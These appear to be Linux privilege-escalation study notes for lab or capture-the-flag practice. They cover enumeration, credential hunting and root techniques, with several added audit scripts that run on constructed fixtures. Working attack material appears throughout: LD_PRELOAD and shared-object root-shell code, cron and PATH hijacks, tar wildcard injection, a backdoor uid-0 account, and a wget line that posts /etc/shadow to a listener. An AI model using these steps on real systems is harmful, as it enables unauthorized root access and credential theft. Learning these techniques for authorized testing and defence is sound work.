LPE


https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md
https://loveleshgangil.medium.com/linux-privilege-escalation-checklist-6ccfb13b11ca : Checklist

SUID checker: python suid3num.py

https://gtfobins.github.io/

Methodology to follow

https://guif.re/linuxeop

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md

sudo -l

Kernel Exploits

OS Exploits

Password reuse (mysql, .bash_history, 000-default.conf...)

Known binaries with suid flag and interactive (nmap)

Custom binaries with suid flag either using other binaries or with command execution

Writable files owned by root that get executed (cronjobs)

MySQL as root

Vulnerable services (chkrootkit, logrotate)

Writable /etc/passwd

Readable .bash_history

SSH private key


Listening ports on localhost

/etc/fstab

/etc/exports

/var/mail

Process as other user (root) executing something you have permissions to modify

SSH public key + Predictable PRNG

apt update hooking (APT::Update::Pre-Invoke)

1. System Enumeration
hostname : hostname

uname -a : kernel information

cat /proc/version : OS/Architecture

cat /etc/issue : distribution banner (another copy of the version string)

cat /etc/os-release : same

cat /etc/*-release : same

ps aux : show processes for all users

ps aux | grep root : look for processes running with high privileged accounts

lscpu : architecture information

date : the date information

timedatectl : time zone, a hint at where the machine is

uptime : how long the machine has been up (a long uptime means the running kernel has not been patched in that time)

env : environmental variables

df -h : how much of the disk was used

ls /dev : device listing

ls /dev | grep -i "sd" : find disks and partitions


cat /etc/fstab : filesystems mounted at boot (may carry credentials for network shares)

top : running processes and load at that moment

mount : currently mounted filesystems and their options (nosuid, noexec, ro)

/bin/lsblk : block devices

https://linux.die.net/man/8/lsblk

ps (process status) output:

PID : process ID

TTY: Terminal type used by user

Time: amount of cpu time used by the process

cmd: the command or executable running

ps -A : view all running process

ps axjf: view process tree

2. User Enumeration
sudo -l :list all commands your user can run using sudo.

id : uid, gid and group memberships

cat /etc/passwd :gives the users

cat /etc/passwd | cut -d : -f 1 :show all users

cat /etc/shadow :check access to shadow file

cat /etc/group : group memberships (docker, lxd, disk, adm and sudo are worth a look)

history : check for passwords or scripts that were executed.

journalctl : systemd journal, if readable

cat /etc/sudoers : sudo rules (normally readable by root only)

whoami

who
w

last

last | tail -n 20

lastlog

sudo su -

Check the content of custom scripts that can be run and see if they can be exploited.
Check binaries that can be run and whether there is a known method to exploit them on GTFOBins.
If the output contains "env_keep+=LD_PRELOAD", see section 13 (Sudo - Environment Variables).

3. Network Enumeration

ifconfig or ip a : IP addresses and networks

ip route : routing table (is there another network reachable from here?)

arp -a (or ip neigh) : ARP/neighbour cache (hosts this machine has talked to)

netstat -ano : which ports are open and what connections exist

netstat -tunap

ss -tunap

lsof -i TCP:1-1024

route (or /sbin/route) : legacy routing table output

Listening ports and established sessions :

netstat -ano

-a: display all sockets

-n: do not resolve names


-o: display timers

netstat -i : interface statistics

Note: these can be used to pivot.

4. Password Hunting

password, pass, pwd, passwd are some variations

grep --color=always -rnwi "PASSWORD" / 2>/dev/null

Identify files containing the word "PASSWORD" and highlight the match. Also try "PASS=" and "PASSWD=". Note that -w wants a word boundary on both sides, so it misses names such as DB_PASSWORD ("_" counts as a word character); drop -w for a wider, noisier sweep.

locate password | more

identify files with "password" (or something similar) in the file name

find / -name id_rsa 2>/dev/null : locate RSA private keys

find / -name authorized_keys 2>/dev/null

cat ~/.bash_history (used again in sections 8-11)

cat ~/.history

history (used again in sections 8-11)

history | grep pass

find . -type f -exec grep -i -I "PASSWORD" {} /dev/null \;

example:

step1. cat myvpn.ovpn

step2. one of the lines can look like this:

auth-user-pass /etc/openvpn/auth.txt

step3. cat /etc/openvpn/auth.txt

Sensitive files or information

Look for sensitive information

Backups
locate '*.bak'
find / -name '*.bak' 2>/dev/null -exec ls -la {} \;

RSA private keys

locate rsa
locate _key
find / -name '*private*' -type f -readable 2>/dev/null -exec ls -la {} \;
find / -name '*_key*' -type f -readable 2>/dev/null -exec ls -la {} \;

Look for hardcoded credentials in files (run from the directory of interest; add 2>/dev/null to hide permission errors)

grep -Ril "flag" .
grep -Ri "password" .
grep -Ri "key" .
grep -Ri "sessionkey" .
grep -Ri "admin" .

Against the whole filesystem this is slow and noisy, but sometimes worth it:

grep -Ril "flag" / 2>/dev/null

** LinPeas, LinEnum
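The password hunt above done as a small helper, as an added example that is not part of the original notes. It scans a constructed sample tree (the paths and file contents below are made up for the demo) with the same kind of grep as section 4, and then follows an OpenVPN "auth-user-pass <file>" reference the way the myvpn.ovpn example does, so the real secret is read from the file the config points at rather than from the config itself.

```sh
# Print "file:line:text" for lines that look like a credential assignment.
# -r recurse, -n line numbers, -I skip binaries, -i ignore case, -E ERE.
# No -w here: "-w PASSWORD" would skip DB_PASSWORD=..., because "_" is a
# word character and grep -w needs a word boundary on both sides.
hunt_creds() {
    grep -rnIiE '(password|passwd|pwd|pass)[[:space:]]*[:=]' "$1" 2>/dev/null || true
}

# Print the credential file an OpenVPN config points at, if any
# (the "auth-user-pass /etc/openvpn/auth.txt" case from the notes).
follow_ovpn() {
    awk '$1 == "auth-user-pass" && NF >= 2 { print $2 }' "$1"
}

# Constructed fixtures: a fake root with an .ovpn, its auth file, a web
# app .env and an innocent .bashrc. Prints the fixture directory.
creds_fixtures() {
    d=$(mktemp -d)
    mkdir -p "$d/etc/openvpn" "$d/home/user" "$d/var/www"
    printf 'client\nremote vpn.example.internal 1194\nauth-user-pass %s/etc/openvpn/auth.txt\n' \
        "$d" > "$d/home/user/myvpn.ovpn"
    printf 'vpnuser\nS3cretVpnPass\n' > "$d/etc/openvpn/auth.txt"
    printf 'DB_HOST=localhost\nDB_PASSWORD=hunter2\n' > "$d/var/www/.env"
    printf 'export EDITOR=vim\nalias ll="ls -l"\n' > "$d/home/user/.bashrc"
    printf '%s\n' "$d"
}

# Walk-through: sweep the tree, then chase the ovpn reference.
demo_creds() {
    d=$(creds_fixtures)
    hunt_creds "$d"
    f=$(follow_ovpn "$d/home/user/myvpn.ovpn")
    echo "ovpn credentials in: $f"
    cat "$f"
}
```

Run demo_creds to see both steps; the .env hit shows why the -w in the notes' one-liner is worth dropping, and the .ovpn file itself never matches, which is why the reference has to be followed.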

5. find command

find . -name flag1.txt :find the file named flag1.txt in the current directory.

find / -type d -name config: find the directory named config under “/”

find / -type f -perm 0777: find files with the 777 permissions (files readable, writable, and
executable by all users)

find / -perm -a=x: find files executable by everyone

find /home -user frank: find all files for user “frank” under “/home”

find / -mtime -10: find files modified in the last 10 days (without the "-", -mtime 10 means exactly 10 days ago)

find / -atime -10: find files accessed in the last 10 days
find / -cmin -60: find files changed within the last hour (60 minutes)

find / -amin -60: find files accesses within the last hour (60 minutes)

find / -size 50M: find files whose size rounds to 50 MiB (use -size +50M for anything larger)

find / -writable -type d 2>/dev/null : Find world-writeable folders

find / -perm -222 -type d 2>/dev/null: Find world-writeable folders

find / -perm -o=w -type d 2>/dev/null: Find world-writeable folders

find / -perm -o=x -type d 2>/dev/null : Find world-executable folders

Find development tools and supported languages:

find / -name 'perl*'

find / -name 'python*'

find / -name 'gcc*'

find /* -user root -perm -4000 -print 2>/dev/null

find / -perm -u=s -type f 2>/dev/null: Find files with the SUID bit, which allows us to run the file
with a higher privilege level than the current user.

Executable writable by others and owned by root

find -P / -type f -executable -user root -perm -o=w 2>/dev/null -exec ls -la {} \;

Executable writable by others and owned by root with SUID set... jackpot!

find -P / -type f -executable -user root -perm -o=w,u=s 2>/dev/null -exec ls -la {} \;

Files readable by others and owned by another user

find -P / -type f -perm -o=r ! -user "$(id -un)" 2>/dev/null -exec ls -la {} \;

find -P / -user root -perm -o=r 2>/dev/null -exec ls -la {} \;

SUID & SGID files

find . -perm /6000 2>/dev/null -exec ls -la {} \;

find / -perm -4000 2>/dev/null

find / -perm -u=s -type f 2>/dev/null; find / -perm -4000 -o -perm -2000 -o -perm -6000 2>/dev/null

Files modified after adding a new user (any other file can be used as the reference)

find -newer /etc/passwd 2>/dev/null -exec ls -la {} \;

Files that were edited within the last hour

find -mmin -60 2>/dev/null -exec ls -la {} \;

Find writable files / dirs outside of your home directory

find / -writable -type f -o -writable -type d 2>/dev/null | grep -Ev "^(/proc|/home/user|/tmp)"

Find directories writable by the current user

find / -writable -type d 2>/dev/null

Files containing passwords:

grep --color=always -rnwi "PASSWORD" / 2>/dev/null

find . -type f -exec grep -i -I "PASSWORD" {} /dev/null \;

find . -type f -exec grep -i -I "database" {} /dev/null \;

The same search for a specific string found earlier (here "drupal4hawk"):

grep --color=always -rnwi "drupal4hawk" / 2>/dev/null

find . -type f -exec grep -i -I "drupal4hawk" {} /dev/null \;

6. Automated Tools

• LinPEAS - https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS

• LinEnum - https://github.com/rebootuser/LinEnum

• Linux Exploit Suggester - https://github.com/mzet-/linux-exploit-suggester

• Linux Priv Checker - https://github.com/sleventyeleven/linuxprivchecker

• GTFONow - https://github.com/Frissi0n/GTFONow

• Linux Smart Enumeration - https://github.com/diego-treitos/linux-smart-enumeration

• BeRoot - https://github.com/AlessandroZ/BeRoot

• unix-privesc-check - https://github.com/pentestmonkey/unix-privesc-check

7. Kernel Exploits

• Identify the kernel/OS version with uname -a (and /etc/os-release), then search for a matching exploit.

• Use Linux Exploit Suggester.

Some resources

https://www.linuxkernelcves.com/cves

https://github.com/lucyoa/kernel-exploits

searchsploit & Exploit-DB

Caveat: kernel exploits can crash the box; match the exact kernel build and try them last.

8. Weak File Permissions : Readable /etc/shadow

step1. cat /etc/shadow (it's readable)

step2. save the root user's hash to a file called hash.txt on your Kali.

step3. john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

step4. su root (with the cracked password)

Alternative: assume both passwd and shadow are readable.

step1. copy them to Kali as passwd.txt & shadow.txt

step2. unshadow passwd.txt shadow.txt > unshadowed.txt (passwd file first, then shadow)

keep only the rows you care about and save the result as creds.txt.

step3. identify the hash type and its hashcat "mode" from the example-hashes list:

https://hashcat.net/wiki/doku.php?id=hashcat

($6$ at the start of the hash is sha512crypt, mode 1800)

step4. hashcat -m <mode> creds.txt rockyou.txt -O

9. Weak File Permissions : Writeable /etc/shadow

step1. ls -l /etc/shadow (writable?)

step2. mkpasswd -m sha-512 newpasswordhere

step3. edit /etc/shadow and replace the second field of the root line with the generated hash (/etc/shadow has no uid/gid fields; the uid comes from /etc/passwd)

step4. su root

10. Weak File Permission - Writeable /etc/passwd

step1. ls -l /etc/passwd (writable?)

step2. mkpasswd -m sha-512 newpasswordhere

step3. edit /etc/passwd: replace the "x" in root's second field with the generated hash (a hash placed directly in /etc/passwd is used instead of the one in /etc/shadow)

step4. su root

Alternative method.

step1. copy the root user's row to the end of the file.

step2. change the username (hacker) and keep uid/gid 0.

step3. put the generated hash in the second field.

step4. su hacker

Edit: you could also have used openssl passwd 12345 (or openssl passwd -6 12345 for sha-512) in step2.

Read this!

https://www.hackingarticles.in/editing-etc-passwd-file-for-privilege-escalation/
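The checks behind sections 8-10, as an added example that is not from the original notes: a reviewer (or a defender looking for the aftermath) wants to know whether /etc/passwd is world-writable, whether /etc/shadow is readable by others, and whether an entry like the "hacker" line above has already been added. The functions below run against constructed copies in a temp directory, never the real files; the hash strings in the fixture are placeholders, not real crypt(3) output.

```sh
# One finding per line for a passwd-format file:
#   uid0-alias:NAME      a second account with uid 0 (the "hacker" entry)
#   hash-in-passwd:NAME  a hash in field 2 instead of "x" (shadow bypassed)
#   empty-password:NAME  empty field 2: login with no password at all
audit_passwd() {
    awk -F: 'NF >= 7 {
        if ($3 == 0 && $1 != "root") print "uid0-alias:" $1
        if ($2 == "")                 print "empty-password:" $1
        else if ($2 != "x" && $2 != "*" && $2 !~ /^!/) print "hash-in-passwd:" $1
    }' "$1"
}

# World-writable passwd ($1) or other-readable shadow ($2), read from the
# octal mode (stat -c %a is GNU coreutils; the last digit is the "other" bits).
audit_perms() {
    p=$(stat -c %a "$1"); s=$(stat -c %a "$2")
    if [ $(( p % 10 & 2 )) -ne 0 ]; then echo "world-writable:$1"; fi
    if [ $(( s % 10 & 4 )) -ne 0 ]; then echo "world-readable:$2"; fi
    return 0
}

# Constructed fixtures mirroring a box where both files are misconfigured
# and a backdoor root-alias account has been appended.
passwd_fixtures() {
    d=$(mktemp -d)
    printf 'root:x:0:0:root:/root:/bin/bash\n' > "$d/passwd"
    printf 'daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n' >> "$d/passwd"
    printf 'user:x:1000:1000:user:/home/user:/bin/bash\n' >> "$d/passwd"
    printf 'svc::1001:1001::/home/svc:/bin/sh\n' >> "$d/passwd"
    printf 'hacker:$6$FAKE$notarealhash:0:0:root:/root:/bin/bash\n' >> "$d/passwd"
    printf 'root:$6$FAKE$notarealhash:19500:0:99999:7:::\n' > "$d/shadow"
    chmod 666 "$d/passwd"     # writable by everyone: section 10
    chmod 644 "$d/shadow"     # readable by everyone: section 8
    printf '%s\n' "$d"
}

# Usage: d=$(passwd_fixtures); audit_passwd "$d/passwd"; audit_perms "$d/passwd" "$d/shadow"
```

On a real host the same two calls take /etc/passwd and /etc/shadow; a clean system prints nothing, since only root has uid 0, every second field is "x" and the modes are 644/640.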

11. Escalation via SSH Keys

find / -name authorized_keys 2>/dev/null : search public keys

find / -name id_rsa 2>/dev/null : search private keys

nano id_rsa : paste the key into a file on the attacking machine

chmod 600 id_rsa (ssh refuses a private key that other users can read)

ssh -i id_rsa root@<target_ip>

12. Escalation via Sudo Shell Escaping

note : the GTFOBins library provides shell escape sequences.

https://gtfobins.github.io/

sudo -l : check what the user may run and search GTFOBins for known shell escapes usable with sudo.

** If no shell escape is available, try abusing intended functionality. Searching GTFOBins for a term like Apache returns nothing; then search the web for "apache sudo privilege escalation".

https://touhidshaikh.com/blog/2018/04/abusing-sudo-linux-privilege-escalation/

sudo apache2 -f /etc/shadow : abusing apache2's intended functionality (it complains about the first line of the "config" file and prints it, i.e. root's hash)

Abusing wget's intended functionality:

sudo wget --post-file=/etc/shadow http://<IP>:<port> : the file is POSTed to a listener you control

Note: see the write-ups of THM's "Privilege Escalation Playground" room, but be aware that the room is no longer active.

** a typical sudoers line looks like this:

root ALL=(ALL:ALL) ALL

13. Sudo - Environment Variables

https://book.hacktricks.xyz/linux-hardening/privilege-escalation#ld_preload

LD_PRELOAD : optional environment variable holding path(s) to shared libraries/objects that the loader loads before any other shared library. This is called preloading a library. sudo normally strips it from the environment, unless sudoers keeps it with env_keep.

step1. sudo -l

step2. check for env_keep+=LD_PRELOAD in the output

step3. save this as /tmp/pe.c

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

/* _init runs when the library is loaded; drop LD_PRELOAD so the
   spawned shell does not load us again, then become root. */
void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("/bin/bash");
}

step4. compile it (-nostartfiles so our _init replaces the default one)

gcc -fPIC -shared -o /tmp/pe.so /tmp/pe.c -nostartfiles

step5. finally, escalate privileges by running any command you are allowed to sudo with the library preloaded:

sudo LD_PRELOAD=/tmp/pe.so <command you can run with sudo>

Note:

Exploit-DB for CVE-2019-14287 (sudo -u#-1 bypass of "!root" restrictions) - https://www.exploit-db.com/exploits/47502

Exploit for CVE-2019-18634 (sudo pwfeedback buffer overflow) - https://github.com/saleemrashid/sudo-cve-2019-18634


14. Cron Jobs - Exploiting Weak File Permissions

https://book.hacktricks.xyz/linux-hardening/privilege-escalation

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md#scheduled-tasks

Cron jobs: programs/scripts scheduled to run at a given time or interval, as a given user. We are looking for a job that runs as root and whose script, or the directory it is resolved from, is writable by us. In this scenario there is a script called overwrite.sh that is world-writable.

Step1. cat /etc/crontab : list system cron jobs (also check /etc/cron.d/, /etc/cron.*/ and /var/spool/cron/crontabs/)

• * * * * * root overwrite.sh

• * * * * * root /usr/local/bin/compress.sh

Step2. locate overwrite.sh

/usr/local/bin/overwrite.sh

step2.1. ls -la /usr/local/bin/overwrite.sh

-rwxr--rw- (world-writable)

Variant A, PATH hijack: overwrite.sh is referenced without a path, so cron resolves it through the PATH line at the top of /etc/crontab. If that PATH lists /home/user before /usr/local/bin, a copy in our home directory wins.

Step3. echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/overwrite.sh

step4. chmod +x /home/user/overwrite.sh

step5. ls -la /tmp (wait a minute for the job to run)

step6. /tmp/bash -p (-p keeps the effective uid instead of dropping back to the real one)

Variant B, overwriting the script itself:

step2.1 ls -la /usr/local/bin/overwrite.sh

-rwxr--rw-

step3. echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /usr/local/bin/overwrite.sh

then steps 5 and 6 as above.

Note: if /home/user/overwrite.sh does not exist yet, create it, then continue from step4.

15. Cron Jobs - Wildcards


step1. cat /etc/crontab

step2. cat /path/to/the/file/XYZ.sh

#!/bin/sh

cd /home/user

tar czf /tmp/backup.tar.gz *

(it does a backup with a wildcard; the shell expands * into file names, and file names that start with -- are parsed by tar as options)

step3. ls -la /path/to/the/file/XYZ.sh

-rwxr--r-- ... /path/to/the/file/XYZ.sh

Not writable, so we cannot change the script; we inject through the wildcard instead.

step4. echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/ABC.sh

step5. chmod +x /home/user/ABC.sh

step6. create these two files in /home/user, named after tar's checkpoint options:

touch /home/user/--checkpoint=1

touch "/home/user/--checkpoint-action=exec=sh ABC.sh"

When the job runs, tar sees --checkpoint=1 --checkpoint-action=exec=sh ABC.sh among its arguments and runs our script as root.

step7. /tmp/bash -p (after the job has run)
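The wildcard injection from section 15 reproduced as the current user, as an added example that is not part of the original notes: it runs the cron script's "tar ... *" against a constructed directory so the mechanism can be watched without root. The planted file names are expanded by the shell into tar options, tar runs the checkpoint command, and a marker file appears where the real payload would have copied bash and set the SUID bit. The hardened variant, which ends option parsing with "--", runs beside it. Directory and file names are made up; GNU tar is required for --checkpoint-action.

```sh
# The vulnerable backup, as in the cron script: the glob expands to bare
# words, so a file called "--checkpoint=1" becomes an option.
backup_vuln() {          # $1 = dir to back up, $2 = archive path
    ( cd "$1" && tar cf "$2" * ) >/dev/null 2>&1
    return 0
}

# Hardened: "--" ends option parsing, so "--checkpoint=1" is just a file
# name. "tar cf archive ./*" works too, since "./--x" does not start with "-".
backup_safe() {
    ( cd "$1" && tar cf "$2" -- * ) >/dev/null 2>&1
    return 0
}

# What the attacker plants in the globbed directory: a payload script and
# two files whose names are tar options (checkpoint every record, and run
# "sh ABC.sh" at each checkpoint). tar hands the exec string to /bin/sh -c
# with the archived directory as cwd, which is why "sh ABC.sh" resolves.
plant_payload() {        # $1 = dir
    printf '#!/bin/sh\ntouch "%s/pwned"\n' "$1" > "$1/ABC.sh"
    touch "$1/--checkpoint=1"
    touch "$1/--checkpoint-action=exec=sh ABC.sh"
}

# Constructed fixture: a "home directory" with a couple of ordinary files.
wildcard_fixtures() {
    d=$(mktemp -d)
    mkdir "$d/home"
    printf 'notes\n' > "$d/home/todo.txt"
    printf 'data\n' > "$d/home/report.csv"
    printf '%s\n' "$d"
}

# Returns 0 if the payload ran during the given backup function.
payload_fired() {        # $1 = backup function name: backup_vuln or backup_safe
    d=$(wildcard_fixtures)
    plant_payload "$d/home"
    "$1" "$d/home" "$d/backup.tar"
    [ -e "$d/home/pwned" ]
}
```

payload_fired backup_vuln succeeds and payload_fired backup_safe fails, which is the whole difference between the two scripts. Compression (czf instead of cf) does not change anything: the checkpoints fire on archive records regardless of the filter.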

16. Cron Jobs - PATH Environment Variable

step1. cat /etc/crontab

Step2. Assume the PATH line in /etc/crontab starts with /home/user in this scenario, and a job calls a script by bare name.

ls -la /home/user

Step3. cd /home/user

Step4. echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/XYZ.sh

step5. chmod +x /home/user/XYZ.sh

step6. /tmp/bash -p (after the job has run)
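The "cat /etc/crontab" checks from sections 14 and 16 done mechanically, as an added example that is not from the original notes. It reads a constructed system crontab, and for every job whose command has no absolute path walks the crontab's own PATH line in order, reporting each world-writable directory met before the one that really holds the command (that is where a lookalike script would be dropped); jobs with an absolute path are checked for a world-writable target instead. The directory tree and crontab lines are made up for the demo.

```sh
# True if the path's "other" bits include write (stat -c %a: GNU coreutils).
world_writable() {
    m=$(stat -c %a "$1" 2>/dev/null) || return 1
    [ $(( m % 10 & 2 )) -ne 0 ]
}

# Walk PATH ($2) in order for a bare command ($1). Every world-writable
# directory met before the real binary is a place to plant a lookalike, so
# it is reported; the walk stops at the first directory that has the file.
check_path() {
    cmd=$1
    oldifs=$IFS; IFS=:
    for dir in $2; do
        IFS=$oldifs
        if world_writable "$dir"; then echo "hijackable:$cmd via $dir/$cmd"; fi
        if [ -e "$dir/$cmd" ]; then
            if world_writable "$dir/$cmd"; then echo "writable-target:$dir/$cmd"; fi
            break
        fi
    done
    IFS=$oldifs
    return 0
}

# System-crontab lines: m h dom mon dow USER command. Only plain schedules
# are handled (no @reboot-style lines); PATH is taken from the first PATH= line.
audit_crontab() {        # $1 = crontab file
    cpath=$(sed -n 's/^PATH=//p' "$1" | head -n 1)
    grep -E '^[[:space:]]*[0-9*]' "$1" | while read -r m h dom mon dow user cmd rest; do
        case "$cmd" in
            /*) if world_writable "$cmd"; then echo "writable-target:$cmd"; fi ;;
            *)  check_path "$cmd" "$cpath" ;;
        esac
    done
    return 0
}

# Constructed fixtures: the notes' scenario in miniature. A world-writable
# home comes first in PATH, overwrite.sh is called by bare name and really
# lives in usr/bin, and compress.sh is called by full path but is 777.
cron_fixtures() {
    d=$(mktemp -d)
    mkdir -p "$d/home/user" "$d/usr/local/bin" "$d/usr/bin"
    chmod 777 "$d/home/user"
    chmod 755 "$d/usr/local/bin" "$d/usr/bin"
    printf '#!/bin/sh\necho hello > /dev/null\n' > "$d/usr/bin/overwrite.sh"
    chmod 755 "$d/usr/bin/overwrite.sh"
    printf '#!/bin/sh\ncd /home/user\ntar czf /tmp/backup.tar.gz *\n' > "$d/usr/local/bin/compress.sh"
    chmod 777 "$d/usr/local/bin/compress.sh"
    printf 'PATH=%s/home/user:%s/usr/local/bin:%s/usr/bin\n' "$d" "$d" "$d" > "$d/crontab"
    printf '* * * * * root overwrite.sh\n' >> "$d/crontab"
    printf '* * * * * root %s/usr/local/bin/compress.sh\n' "$d" >> "$d/crontab"
    printf '%s\n' "$d"
}

# Usage: d=$(cron_fixtures); audit_crontab "$d/crontab"
```

Against a real box pass /etc/crontab (and each file in /etc/cron.d/) and replace world_writable with a check for directories the current user can write to, which is the question the attacker actually asks; the world-writable test is used here because the fixture is owned by whoever runs it.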

17. SUID / SGID Executables : Known Exploits

SUID & SGID let a user execute a file with the privileges of the file's owner or group, respectively. A SUID file owned by root runs as root no matter who launches it.

So if we reach the target as a non-root user and find SUID binaries owned by root, anything those binaries can be made to do happens with root privileges.

Some binaries can be abused by non-root users to gain root when the SUID bit is set on them, for example bash, cat, cp, echo and find. GTFOBins lists the SUID entries and how to use each one.

These files show an "s" in place of the owner's "x" in ls -l output.

Note: linux-exploit-suggester.sh also reports some of these.

IMPORTANT : not every SUID binary is exploitable; the standard ones (passwd, sudo, mount...) are expected.

step1. Listing SUID/SGID files

To list files which have SUID or SGID bits set:

• find /* -user root -perm -4000 -print 2>/dev/null

Locate by SUID bit, then look for SUID files that call a program without a full path.

• find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2>/dev/null

#Find SUID

• find / -perm -u=s -type f 2>/dev/null

Locate SUIDs

• find / -perm -4000 -type f -exec ls -la {} \; 2>/dev/null

• find / -uid 0 -perm -4000 -type f 2>/dev/null

Locate by SUID bit, owned by root

#Find SGID

find / -perm -g=s -type f 2>/dev/null


step2. Try to find an exploit to results from Google, Exploitdb, GTFOBins, etc.

** Some binaries should never be in that list (nano, for instance). To exploit: a SUID binary runs as the user who owns it; if that is root, we try to turn it into a root shell or a root write.

ls -la /bin/nano

-rwsr-xr-x root root ... /bin/nano

ls -la /etc/sudoers

-r--r----- root root ... /etc/sudoers

/bin/nano /etc/sudoers

nano is now writing as root, so add this:

hacker ALL=(ALL:ALL) ALL

save & exit.

sudo -l

sudo su root (I'm root).

18. SUID/SGID Executables - Shared Object Injection

Pay attention to SUID binaries that load shared objects (the equivalent of DLLs on Windows) from paths we control. For example /usr/local/bin/suid-so is vulnerable to shared object injection.

step1. /usr/local/bin/suid-so : execute the file.

step2. strace /usr/local/bin/suid-so 2>&1 | grep -iE "open|access|no such file"

Search the output for open/access calls and "no such file" errors. The executable tries to load the shared object /home/user/.config/libcalc.so from the home directory, but it does not exist.

step3. mkdir /home/user/.config : create the .config directory for libcalc.so.

step4. nano /home/user/libcalc.c

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* constructor: runs when the library is loaded, before main() */
static void inject() __attribute__((constructor));

void inject() {
    setuid(0);
    system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p");
}

step5. gcc -shared -fPIC -o /home/user/.config/libcalc.so /home/user/libcalc.c

step6. /usr/local/bin/suid-so

19. SUID/SGID Executables - Environment Variables

note: two other SUID binaries worth looking at in the same lab are suid-env and suid-env2, both vulnerable through the environment they run with.

step1. find / -type f -perm -04000 -ls 2>/dev/null

Find all SUID files.

step2. Check the file: /usr/local/bin/suid-env

step3. Try running this binary and see what happens.

/usr/local/bin/suid-env

step4. strings extracts the printable text from a binary.

strings /usr/local/bin/suid-env

At the bottom we see "service apache2 start": it starts the apache2 service through the "service" command, which is found via PATH. Let's print PATH.

** "service" is called without an absolute path. When suid-env runs, it calls service and the system looks for it in the directories listed in PATH, in order. So if we add a directory to the front of PATH, the system finds our copy first.

echo $PATH : shows the directories searched for commands.

*** The main idea: change where "service" is found, by making a malicious program called service and putting its directory first in PATH.

step5. write the malicious service (the includes keep modern gcc from rejecting the implicit declarations):

echo '#include <stdlib.h>
#include <unistd.h>
int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/service.c

step6. gcc /tmp/service.c -o /tmp/service

Now we have a malicious service in /tmp. Next we change our PATH.

step7. export PATH=/tmp:$PATH

step8. echo $PATH : /tmp is first now.

step9. /usr/local/bin/suid-env

for suid-env2

step1. /usr/local/bin/suid-env2

step2. strings /usr/local/bin/suid-env2

at the bottom we have

/usr/sbin/service apache2 start

This time the path is absolute, so PATH does not help. The binary still runs the command through a shell, and if that shell is an old bash (before 4.2-048) it imports exported functions whose names look like absolute paths and calls them instead of the real file. So we define one:

step3. function /usr/sbin/service() { cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p; }

step4. export -f /usr/sbin/service

step5. /usr/local/bin/suid-env2

root.
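The SUID sweep from section 17 with the follow-up question of section 19 answered inline, as an added example that is not from the original notes. For each SUID or SGID file under a given root it prints owner and mode, flags world-writable files (the "jackpot" case from section 5), and does the "strings, then look for a command called by bare name" step with grep -a: a command name not preceded by "/" is resolved through PATH at run time, which is what the PATH hijack relies on. The fixtures are shell scripts standing in for the compiled suid-env binaries; the watch list of command names is a judgement call, not anything from the notes.

```sh
# Commands worth noticing when a privileged binary invokes them by bare name.
BARE_CMDS='service|cp|mv|chmod|chown|tar|sh|bash|python[0-9.]*|perl'

# Print the watch-listed names that $1 invokes without a leading "/",
# comma-separated, or an empty line. grep -a treats binaries as text, which
# is the strings(1) step; the leading char class excludes "/" and path chars.
bare_execs() {
    names=$(grep -aoE "(^|[^/[:alnum:]_.-])($BARE_CMDS)[[:space:]]" "$1" 2>/dev/null \
        | sed 's/^[^[:alnum:]]*//; s/[[:space:]]*$//' | sort -u | tr '\n' ',')
    printf '%s\n' "${names%,}"
}

# One line per SUID/SGID file under $1: path, owner, octal mode, flags.
audit_suid() {
    find "$1" -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null | sort | while read -r f; do
        owner=$(stat -c %U "$f"); mode=$(stat -c %a "$f")
        flags=""
        if [ $(( mode % 10 & 2 )) -ne 0 ]; then flags="$flags world-writable"; fi
        bare=$(bare_execs "$f")
        if [ -n "$bare" ]; then flags="$flags bare-exec=$bare"; fi
        echo "$f owner=$owner mode=$mode$flags"
    done
    return 0
}

# Constructed fixtures standing in for the lab binaries: suid-env calls
# "service" by bare name, suid-env2 by full path, "backup" is a 4777 script
# calling tar, and "plain" is not SUID at all. Contents are written before
# chmod because a write by an unprivileged user clears the SUID bit.
suid_fixtures() {
    d=$(mktemp -d)
    mkdir -p "$d/usr/local/bin"
    printf '#!/bin/sh\nservice apache2 start\n' > "$d/usr/local/bin/suid-env"
    printf '#!/bin/sh\n/usr/sbin/service apache2 start\n' > "$d/usr/local/bin/suid-env2"
    printf '#!/bin/sh\ncd /home/user\ntar czf /tmp/backup.tar.gz *\n' > "$d/usr/local/bin/backup"
    printf '#!/bin/sh\necho not suid\n' > "$d/usr/local/bin/plain"
    chmod 4755 "$d/usr/local/bin/suid-env" "$d/usr/local/bin/suid-env2"
    chmod 4777 "$d/usr/local/bin/backup"
    chmod 755 "$d/usr/local/bin/plain"
    printf '%s\n' "$d"
}

# Usage: d=$(suid_fixtures); audit_suid "$d"      (or audit_suid / on a target)
```

On a target, audit_suid / lists the expected root-owned set (passwd, sudo, mount...) without flags; anything with bare-exec= is a candidate for the PATH trick of section 19, and anything with world-writable is the section 5 jackpot.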

20. Capabilities

Linux divides the privileges traditionally associated with the superuser into distinct units, known as capabilities, which can be independently enabled and disabled.

https://linux.die.net/man/7/capabilities

To find files with capabilities set:

step1. getcap -r / 2>/dev/null

/usr/bin/python2.6 = cap_setuid+ep ("+ep": the capability is in the effective and permitted sets, so the binary may change its uid, including to 0)

